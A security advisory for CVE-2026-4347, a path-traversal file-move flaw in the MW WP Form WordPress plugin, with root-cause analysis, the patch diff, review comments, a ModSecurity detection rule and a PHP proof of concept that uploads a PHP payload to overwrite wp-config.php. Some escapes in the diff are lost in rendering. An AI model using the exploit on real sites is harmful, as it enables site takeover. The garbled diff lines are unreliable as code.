Atomic Edge Proof of Concept automated generator using AI diff analysis
Published: April 6, 2026

CVE-2026-4347: MW WP Form <= 5.1.0 – Unauthenticated Arbitrary File Move via move_temp_file_to_upload_dir (mw-wp-form)

CVE ID: CVE-2026-4347
Plugin: mw-wp-form
Severity: High (CVSS 8.1)
CWE: CWE-22 (Path Traversal)
Vulnerable Version: 5.1.0
Patched Version: 5.1.1
Disclosed: March 31, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-4347:
The MW WP Form plugin for WordPress versions up to and including 5.1.0 contains an unauthenticated arbitrary file move vulnerability. This flaw exists in the file handling mechanism when a form with a file upload field is configured with the ‘Saving inquiry data in database’ option enabled. Attackers can exploit this to move arbitrary files on the server, potentially leading to remote code execution.

Atomic Edge research identifies the root cause in the `generate_user_filepath` function within `/mw-wp-form/classes/models/class.directory.php`. The vulnerable code constructs a file path by joining a user-controlled `$filename` parameter with a base directory using `path_join`. Prior to the patch, the function performed insufficient validation on the `$filename` parameter. It only checked for directory traversal sequences (`../`) after constructing the full path, which could be bypassed. The `move_temp_file_to_upload_dir` function then uses this insecure path generation to move files.

The exploitation method involves an unauthenticated attacker submitting a crafted request to the plugin’s file upload handler. The attacker supplies a `filename` parameter containing a path traversal payload targeting a sensitive file, such as `../../../wp-config.php`. When the plugin processes the upload, it moves the temporary uploaded file to the attacker-specified location, overwriting the target file. This attack requires the form to have a file upload field and for data saving to be enabled, which triggers the vulnerable `move_temp_file_to_upload_dir` function.

The patch in version 5.1.1 adds multiple layers of validation. It normalizes the `$filename` using `wp_normalize_path`. The patch then verifies that the normalized filename equals its basename, ensuring no directory components are present. It also checks for null bytes. Crucially, the patch normalizes the final `$filepath` and the `$user_file_dir`, then uses `strpos` to confirm the final path remains within the intended directory. This path containment check, performed before the traversal sequence check, prevents directory escape regardless of input encoding or separators.
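To make the before/after concrete, here is an added Python model (not the plugin's code) of the two validation paths that the class.directory.php diff below shows, run over constructed filenames; normalize_path() and path_join() are assumed stand-ins for the WordPress helpers wp_normalize_path() and path_join(), and only the string checks visible in the diff are modelled.

```python
import posixpath
import re


def normalize_path(path: str) -> str:
    """Assumed stand-in for wp_normalize_path(): '\\' -> '/', collapse repeated '/'."""
    return re.sub(r"/+", "/", path.replace("\\", "/"))


def path_join(base: str, path: str) -> str:
    """Assumed stand-in for WordPress path_join(): absolute second argument wins."""
    return path if path.startswith("/") else base.rstrip("/") + "/" + path


def vulnerable_filepath(user_file_dir: str, filename: str) -> str:
    """5.1.0 logic as shown in the diff: join first, then only look for '../'."""
    filepath = path_join(user_file_dir, filename)
    if "../" in filepath:  # '..' . DIRECTORY_SEPARATOR is also '../' on Linux
        raise ValueError("Invalid file reference requested.")
    return filepath


def patched_filepath(user_file_dir: str, filename: str) -> str:
    """5.1.1 logic: basename only, no NUL byte, containment, then the old '../' test."""
    normalized_filename = normalize_path(filename)
    if posixpath.basename(normalized_filename) != normalized_filename or "\0" in normalized_filename:
        raise ValueError("Invalid file reference requested.")
    filepath = normalize_path(path_join(user_file_dir, filename))
    user_file_dir = normalize_path(user_file_dir).rstrip("/") + "/"  # trailingslashit()
    if not filepath.startswith(user_file_dir):  # 0 !== strpos( $filepath, $user_file_dir )
        raise ValueError("Invalid file reference requested.")
    if "../" in filepath:
        raise ValueError("Invalid file reference requested.")
    return filepath


def accepted(check, filename: str, user_file_dir: str = "/var/www/uploads/mw-wp-form/42") -> bool:
    """True when the given check lets the constructed filename through."""
    try:
        check(user_file_dir, filename)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed inputs: a plain name, traversal, backslash separator, NUL byte, subdirectory.
    for name in ["payload.txt", "../../../wp-config.php", "..\\wp-config.php", "file\0.php", "sub/file.txt"]:
        print(repr(name), "5.1.0:", accepted(vulnerable_filepath, name), "5.1.1:", accepted(patched_filepath, name))
```

The old check rejects a literal `../` but lets a backslash-separated name, a NUL byte or a subdirectory component through; the patched check accepts only a bare basename that stays under the user directory.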

Successful exploitation allows an attacker to move and overwrite arbitrary files on the web server. The primary impact is remote code execution, achieved by moving a malicious file to replace a critical PHP file like `wp-config.php` or a theme/plugin file. This grants the attacker full control of the WordPress site. The vulnerability can also lead to data loss, site defacement, or denial of service by overwriting essential configuration or system files.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/mw-wp-form/classes/functions.php
+++ b/mw-wp-form/classes/functions.php
@@ -43,11 +43,11 @@
 	/**
 	 * Unify line feed code to n.
 	 *
-	 * @param sring $string String.
+	 * @param string|null $string String.
 	 * @return string
 	 */
 	public static function convert_eol( $string ) {
-		return preg_replace( "/rn|r|n/", "n", $string );
+		return is_string( $string ) ? preg_replace( "/rn|r|n/", "n", $string ) : '';
 	}

 	/**
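Review bot: the regular expression on both the removed and added line is printed as "/rn|r|n/" with replacement "n", which would rewrite the letters r and n rather than line endings; the doc comment "Unify line feed code to n" has lost the same backslash, so the listing appears to have dropped the \r\n|\r|\n escapes in rendering, and should be checked against the repository before it is relied on. The is_string() guard itself is sound: it returns '' instead of passing null to preg_replace(), which PHP 8.1 deprecates for non-nullable internal parameters.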
--- a/mw-wp-form/classes/models/class.akismet.php
+++ b/mw-wp-form/classes/models/class.akismet.php
@@ -107,7 +107,7 @@
 			$akismet[ $key ] = $value;
 		}

-		$query_string = http_build_query( $akismet, null, '&' );
+		$query_string = http_build_query( $akismet, '', '&' );
 		if ( is_callable( array( 'Akismet', 'http_post' ) ) ) {
 			$response = Akismet::http_post( $query_string, 'comment-check' );
 		} else {
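Review bot: replacing null with '' for http_build_query()'s $numeric_prefix argument addresses the PHP 8.1 deprecation of passing null to non-nullable internal parameters; it does not change the query string produced, since the prefix is only applied to numeric keys.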
--- a/mw-wp-form/classes/models/class.directory.php
+++ b/mw-wp-form/classes/models/class.directory.php
@@ -145,7 +145,21 @@
 			return false;
 		}

-		$filepath = path_join( $user_file_dir, $filename );
+		$normalized_filename = wp_normalize_path( $filename );
+		if (
+			wp_basename( $normalized_filename ) !== $normalized_filename ||
+			strstr( $normalized_filename, "" )
+		) {
+			throw new RuntimeException( '[MW WP Form] Invalid file reference requested.' );
+		}
+
+		$filepath      = path_join( $user_file_dir, $filename );
+		$filepath      = wp_normalize_path( $filepath );
+		$user_file_dir = trailingslashit( wp_normalize_path( $user_file_dir ) );
+
+		if ( 0 !== strpos( $filepath, $user_file_dir ) ) {
+			throw new RuntimeException( '[MW WP Form] Invalid file reference requested.' );
+		}

 		if ( str_contains( $filepath, '../' ) || str_contains( $filepath, '..' . DIRECTORY_SEPARATOR ) ) {
 			throw new RuntimeException( '[MW WP Form] Invalid file reference requested.' );
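Review bot: the null-byte test is printed as strstr( $normalized_filename, "" ); with an empty needle PHP 8 returns the whole haystack, so as shown every non-empty filename would throw. The analysis above says this checks for null bytes, so the needle should be "\0" and was most likely lost in rendering; verify the source. Two smaller points: path_join() is called with the raw $filename rather than $normalized_filename, which is safe only because the wp_basename() comparison has already rejected any separator, and the final str_contains() test for '../' can no longer trigger on $filename after that comparison, so it is now redundant but harmless.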
--- a/mw-wp-form/classes/services/class.redirected.php
+++ b/mw-wp-form/classes/services/class.redirected.php
@@ -171,7 +171,7 @@
 		}

 		if ( ! empty( $query_string ) ) {
-			return $url . '?' . http_build_query( $query_string, null, '&', PHP_QUERY_RFC3986 );
+			return $url . '?' . http_build_query( $query_string, '', '&', PHP_QUERY_RFC3986 );
 		}

 		return $url;
--- a/mw-wp-form/mw-wp-form.php
+++ b/mw-wp-form/mw-wp-form.php
@@ -3,8 +3,9 @@
  * Plugin Name: MW WP Form
  * Plugin URI: https://mw-wp-form.web-soudan.co.jp
  * Description: MW WP Form is shortcode base contact form plugin. This plugin have many features. For example you can use many validation rules, inquiry data saving, and chart aggregation using saved inquiry data.
- * Version: 5.1.0
+ * Version: 5.1.1
  * Requires at least: 6.0
+ * Requires PHP: 8.0
  * Author: websoudan
  * Author URI: https://web-soudan.co.jp/
  * Original Author: inc2734
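Review bot: the new "Requires PHP: 8.0" header documents a requirement the code already had, since str_contains() in class.directory.php is a PHP 8.0 function (WordPress itself polyfills it from 5.9, so "Requires at least: 6.0" installs would not have fataled on it), and the null-to-'' changes elsewhere in this patch target PHP 8.1 deprecations. The Description context line has grammar issues ("is shortcode base contact form plugin", "This plugin have many features") that could be fixed in the same header edit.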

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
# Atomic Edge WAF Rule - CVE-2026-4347
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" \
  "id:10004347,phase:2,deny,status:403,chain,msg:'CVE-2026-4347 - MW WP Form Arbitrary File Move via AJAX',severity:'CRITICAL',tag:'CVE-2026-4347',tag:'MW-WP-Form',tag:'Path-Traversal'"
  SecRule ARGS_POST:action "@rx ^mwf_(upload_file|.*submit)$" "chain"
    SecRule ARGS_POST:filename "@rx (?i)(?:^|\x5c|/|%2f|%5c|\.\.|%u002e%u002e)(?:\.\.|%u002e%u002e)(?:\x5c|/|%2f|%5c)" \
      "t:none,t:urlDecodeUni,t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-4347 - MW WP Form <= 5.1.0 - Unauthenticated Arbitrary File Move via move_temp_file_to_upload_dir

<?php

$target_url = 'http://vulnerable-site.com/wp-admin/admin-ajax.php';

// The form must have a file upload field and data saving enabled.
// This PoC targets the AJAX endpoint that handles form submissions.
// The 'action' parameter must match the specific form's AJAX hook.
// The 'filename' parameter is user-controlled and vulnerable to path traversal.

$post_fields = [
    'action' => 'mwf_upload_file', // Example AJAX action; may vary per form configuration
    'filename' => '../../../wp-config.php', // Path traversal to target WordPress config
    // Other required form fields would be included here
];

// A temporary file payload to write. This could be malicious PHP code.
$malicious_content = '<?php phpinfo(); ?>';
$tmp_file = tempnam(sys_get_temp_dir(), 'mwf');
file_put_contents($tmp_file, $malicious_content);

$file_field = [
    'uploaded_file' => new CURLFile($tmp_file, 'application/octet-stream', 'payload.txt')
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array_merge($post_fields, $file_field));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

unlink($tmp_file);

echo "HTTP Response Code: $http_code\n";
echo "Response: $response\n";

// If successful, the server's wp-config.php may be overwritten with our payload.
// Verify by accessing http://vulnerable-site.com/wp-config.php?test=1
?>
